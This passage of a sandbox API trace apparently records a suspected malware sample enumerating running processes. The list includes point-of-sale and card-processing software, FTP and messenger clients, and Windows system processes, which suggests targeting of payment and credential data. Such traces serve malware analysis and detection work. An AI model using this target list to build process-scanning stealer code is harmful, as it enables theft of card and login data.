th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0205.101] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0205.104] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0205.107] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0205.109] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0205.112] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0205.120] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0205.123] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0205.126] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0205.129] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0205.131] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0205.134] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0205.137] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0205.140] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0205.143] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0205.145] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0205.148] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0205.151] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0205.155] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0205.163] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0205.166] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0205.168] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0205.171] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0205.173] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0205.174] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.176] Process32Next (in: hSnapshot=0x20f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0205.179] CloseHandle (hObject=0x20f0) returned 1 [0205.179] Sleep (dwMilliseconds=0x64) [0205.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20f4 [0205.314] Process32First (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.316] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.319] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.321] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.324] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.326] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.328] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.330] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.332] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.334] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.413] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.418] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0205.422] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.425] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.428] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.431] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.434] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.437] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.441] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.444] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0205.446] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0205.449] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.495] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0205.498] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.502] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0205.505] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0205.508] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0205.510] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0205.513] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0205.515] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0205.518] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.520] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.523] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0205.526] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.528] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.535] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0205.544] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0205.547] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0205.550] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0205.552] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0205.555] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0205.558] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0205.561] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0205.563] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0205.566] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0205.568] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0205.571] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0205.574] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0205.576] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0205.583] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0205.586] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0205.588] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0205.592] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0205.595] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0205.597] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0205.600] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0205.602] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0205.605] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0205.607] Process32Next (in: hSnapshot=0x20f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 